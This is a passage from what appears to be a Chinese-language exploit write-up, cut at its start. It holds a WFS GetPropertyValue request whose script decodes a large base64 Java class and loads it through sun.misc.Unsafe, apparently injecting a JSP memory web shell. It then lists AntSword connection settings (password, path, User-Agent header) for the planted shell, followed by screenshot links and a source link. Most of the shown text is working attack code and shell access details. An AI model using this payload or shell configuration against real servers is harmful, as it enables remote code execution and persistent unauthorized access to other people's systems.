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";
var bt;
try {
    bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
    bt = java.util.Base64.getDecoder().decode(str);
}
var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
unsafe = theUnsafe.get(null);
unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
')</wfs:valueReference>
</wfs:GetPropertyValue>
```

![1720271963308-6f307ced-f45c-4550-8360-5e65e047c8aa.png](./img/I_3rARKIbHehVqWf/1720271963308-6f307ced-f45c-4550-8360-5e65e047c8aa-860623.png)

蚁剑：

```http
密码: ant
请求路径: /*
请求头: User-Agent: Ictguw
脚本类型: JSP
```

![1720272009192-25fe50de-053f-4d95-9ae3-57bb7247d8e3.png](./img/I_3rARKIbHehVqWf/1720272009192-25fe50de-053f-4d95-9ae3-57bb7247d8e3-407942.png)

![1720272018720-abe32113-a969-44c5-8216-9e95ab71d3d8.png](./img/I_3rARKIbHehVqWf/1720272018720-abe32113-a969-44c5-8216-9e95ab71d3d8-309245.png)

![1720272033524-e37f6e77-7c6c-4a20-9e62-bcc66f697635.png](./img/I_3rARKIbHehVqWf/1720272033524-e37f6e77-7c6c-4a20-9e62-bcc66f697635-976410.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fdfchodbcr91z97q>